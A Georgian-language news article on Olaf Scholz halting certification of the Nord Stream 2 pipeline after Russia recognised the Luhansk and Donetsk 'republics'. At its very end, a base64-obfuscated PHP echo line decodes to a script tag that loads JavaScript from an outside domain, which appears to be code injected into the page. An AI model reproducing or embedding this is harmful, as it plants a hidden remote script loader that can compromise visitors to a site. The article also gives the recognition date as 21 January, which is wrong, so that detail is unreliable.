celsiusi
ავერსი შნაიდერი
გერმანიის კანცლერმა ოლაფ შოლცმა უკრაინაში შექმნილი კრიზისული ვითარების საპასუხოდ გაზსადენ „ჩრდილოეთის ნაკადის“ სერტიფიცირების პროცესის შეჩერების შესახებ განაცხადა.
 
„ჩრდილოეთის ნაკადი 2“ (Nორდ შტრეამ 2) არის გაზსადენი, რომლითაც წელიწადში 55 მილიარდი კუბომეტრი რუსული ბუნებრივი აირი ევროპაში უნდა გავიდეს. მარშრუტი იწყება რუსეთის ქალაქ უსტ-ლუგადან, ხოლო მთავრდება გერმანიის ქალაქ გრაიფსვალდში. მილსადენის პროექტის მშენებლობა დასრულებულია, მაგრამ ჯერ კიდევ სჭირდება გერმანიის მარეგულირებელის სერტიფიკატი გაზის მიწოდებამდე. აშშ-მა განაცხადა, რომ თუ რუსეთი უკრაინაში შეიჭრებოდა, გაზსადენის პროექტი არ განოხციელდებოდა.
 
„დღეს მე ვთხოვე ეკონომიკის სამინისტროს, უკან გაეწვია ენერგეტიკის მარეგულირებელ ორგანოში წარდგენილი მიწოდების უსაფრთხოების არსებული ანალიზი“, — განაცხადა შოლცმა.
 
გასული წლის ოქტომბრის ამ სავალდებულო დასკვნაში ნათქვამია, რომ მილსადენი არ წარმოადგენს საფრთხეს მომარაგების უსაფრთხოებისთვის.
 
”ეს ჟღერს როგორც ტექნიკური საკითხი, მაგრამ ეს არის აუცილებელი ადმინისტრაციული ნაბიჯი, რათა ახლა არ მოხდეს მილსადენის სერტიფიცირება. ხოლო ამ სერთიფიკატის გარეშე „Nორდ შტრეამ 2“ ექსპლუატაციაში ვერ შევა”, — დასძინა მან.
 
რუსეთმა 21 იანვარს ლუგანსკისა და დონეცკის ე.წ. რესპუბლიკების დამოუკიდებლობა ცნო. დასვალეთმა ეს ფაქტი უკრაინის ტერიტორიული მთლიანობისა და სუვერენიტეტის შელახვად შეაფასა და საპასუხო ზომები დაანონსა.
818
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");